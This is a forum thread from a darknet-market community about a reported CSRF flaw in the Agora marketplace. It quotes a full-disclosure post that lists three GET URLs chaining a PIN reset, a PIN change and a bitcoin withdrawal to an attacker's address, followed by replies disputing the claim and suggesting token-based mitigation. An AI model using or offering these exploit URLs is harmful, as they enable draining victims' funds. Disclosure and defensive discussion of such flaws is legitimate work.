[Complaint/Warning] Agora CRSF Flaw pretty serious.

Agora CRSF Flaw, fairly major. Has it been patched? http://seclists.org/fulldisclosure/2015/Feb/64

I haven't seen a thing about this on the DNM subreddit so here is the breakdown, if anyone can chime in with a "yea this is fixed" that would be awesome.

"Agora Marketplace CSRF to Steal Bitcoins (agorahooawayyfoe.onion) From: agoraagoraagora () hushmail com Date: Wed, 18 Feb 2015 06:11:36 +0000

Ladies and gentlemen Boys and girls It come to our attention that a brave warrior for the people Ross William Ulbricht was unlawfully convicted by the corporation known as the American government.

This mockery of justice has not gone unnoticed.

In order to protect the next generation of darknet markets we will be disclosing vulnerabilities for these sites in order to make these sites safer from attack.

To start, the Agora Marketplace contains a CSRF vulnerability which can be used to drain a victim account of all of their Bitcoins. The following URLs can be used to perform this attack:

URL to start PIN reset: http://agorahooawayyfoe.onion/startresetpin?action=askresetpinaction&controller=user&confirmed=true&confirm-submit=

URL to change current PIN: http://agorahooawayyfoe.onion/resetpin?pin1=1337&pin2=1337&submit=Save

URL to send bitcoins using the new pin: http://agorahooawayyfoe.onion/sendbitcoins?targetaddress=[YOUR_BTC_ADDY]&withdrawschedule=0&targetamount=1&walletpin=1337&submit=Send

These are all GET requests and don't require JavaScript to work. NoScript cannot save you from poor coding practices.

There will be more to come. Stay safe. Stay anonymous.

-The Guardians of Peace "


Comments


[14 Points] Vendor_BBMC:

This is bollocks.

Agora is now a bitcoinless marketplace. All the wallet trouble was the changeover.

Bitcoin gets left at the door, and tumbled while you are handed casino chips to spend in the marketplace.

When the vendor withdraws funds, the casino chips are replaced with bitcoin sent from the tumbler outside the door. Inside, the escrows, commission, postage, finalizing, refunds - are all just maths. Nothing occurs on the blockchain. Its a fly-by-wire marketplace without bitcoin or wallets. 4% less is sent to vendors than is deposited by buyers - their comission.

remember how deposits werent being credited to you on the market? but all the internal trading continued to work wen the tumbler and wallets werent working? The big roundabout tumbler wheel outside the casino wasn't attached. It was just freewheeling

Agora will get this kind of ill-thought blackmail or scam attempt every day of the week. nobody can "hack" their "escrow wallet". there isn't one


[3 Points] JohnTSchmitz:

What fine rhetoric.

Kill the pigs ... death to whitey ... Attica!


[3 Points] None:

Agora needs to implement a randomly generated unique key as a token that only the client's browser knows. This will mitigate a CSRF attack as the attacker will need to know the key as well to make POST or GET requests.

The token could still be compromised if the coding uses POST or GET requests to input into unfiltered fields.

If both vectors are protected, the only probable way to further compromise the user to get the token would be to actually attack the client's system directly, which would no longer be a problem with Agora.


[2 Points] Csrfthrowaway1:

Yeah ok cool, I created a throwaway account on Agora with some BTC in it. Anyone care to give me some link to click using Tor and Noscript and show me how he steals my coins using the above..? Sounds like a fun experiment no?


[2 Points] rant-caseydnm:

csrf*


[2 Points] gwern:

There wasn't much interest at https://www.reddit.com/r/AgMarketplace/comments/2wgrg4/agora_marketplace_csrf_to_steal_bitcoins/


[1 Points] STB_KING:

Thanks you.

This is exactly what this community needs


[-2 Points] 888b:

So I appreciate your concern for keeping the site and users safe but why give the exact directions to violate victims? That wasn't needed to validate your claim.


[-2 Points] Vendor_BBMC:

What does CRSF stand for, EmeraldGemeni?

Are you recommending we take heed of this psychopath calling himself the guardians of peace?

Or are you telling us its an obvious hoax. Don't click any of the links under any circumstances?

psychos ALWAYS do that "stay safe, people" thing at the end.

Yeah, safe from YOU mate. you need to stop feeling out whether to blackmail or continue pretending to be a good but vaguely threatenning citizen.

Normal people aren't 2 things at once.

Either recommendation is valid, rant-caseydnm. I realize you want the truth as much as we all do. Nothing for you to get angry about, just want to make it clear that any criticism from me is aimed at the dickless dweeb pretending to be some superheroes. Not at you for bringing it to our attention.